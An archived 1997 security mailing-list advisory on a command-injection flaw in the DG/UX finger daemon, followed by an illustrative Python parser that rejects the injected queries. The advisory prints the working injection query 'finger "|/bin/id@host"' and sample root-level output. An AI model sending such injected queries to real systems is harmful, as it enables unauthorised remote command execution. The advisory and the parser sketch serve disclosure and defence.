[308] in Best-of-Security

BoS: dgux in.fingerd vulnerability

daemon@ATHENA.MIT.EDU (George Imburgia)
Thu Aug 14 03:50:11 1997

Date: 	Mon, 11 Aug 1997 12:32:38 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au


Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W@host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id@host"

Often, you will see something like this;

uid=0(root) gid=0(root)

or;

uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
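
Added example, not part of the original post and not dgux code: a sketch of how a finger daemon can parse the request line so that "/W" is handled as the RFC 1288 verbose token and a line such as "|/bin/id" is refused instead of reaching a shell. The names parse_finger_query, RejectedQuery and classify, the username allowlist, the 512-byte cap and the policy of refusing forwarded (@host) queries are assumptions made for this illustration; the request lines are constructed samples.

```python
import re

# Assumption: local login names fit this conservative allowlist.
USERNAME_RE = re.compile(rb"[A-Za-z0-9._-]{1,32}")
MAX_LINE = 512  # assumption: cap on request length, in bytes


class RejectedQuery(ValueError):
    """Request line outside the accepted subset of RFC 1288."""


def parse_finger_query(line):
    """Parse one request line into {'verbose': bool, 'user': str or None}.

    Accepted forms: CRLF, "/W" CRLF, "/W" SP username CRLF, username CRLF.
    """
    if len(line) > MAX_LINE or not line.endswith(b"\r\n"):
        raise RejectedQuery("missing CRLF or oversized request")
    body = line[:-2]
    verbose = False
    # "/W" is the verbose token; it must never be looked up as a login name.
    if body == b"/W" or body.startswith(b"/W "):
        verbose = True
        body = body[2:].lstrip(b" ")
    if body == b"":
        return {"verbose": verbose, "user": None}  # request to list users
    if b"@" in body:
        raise RejectedQuery("forwarding refused")  # policy choice (assumption)
    if not USERNAME_RE.fullmatch(body):
        raise RejectedQuery("illegal character in username")
    return {"verbose": verbose, "user": body.decode("ascii")}


# Constructed request lines, as a server would read them from TCP port 79.
SAMPLES = [b"\r\n", b"/W\r\n", b"/W gti\r\n", b"gti\r\n",
           b"|/bin/id\r\n", b"gti@other\r\n"]


def classify(samples=SAMPLES):
    """Return (line, parsed dict or rejection reason) for each sample."""
    results = []
    for s in samples:
        try:
            results.append((s, parse_finger_query(s)))
        except RejectedQuery as exc:
            results.append((s, f"rejected: {exc}"))
    return results


if __name__ == "__main__":
    for line, outcome in classify():
        print(repr(line), "->", outcome)
```

The parsed username should then go to a password-database lookup such as pwd.getpwnam(), never into a command string handed to a shell.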


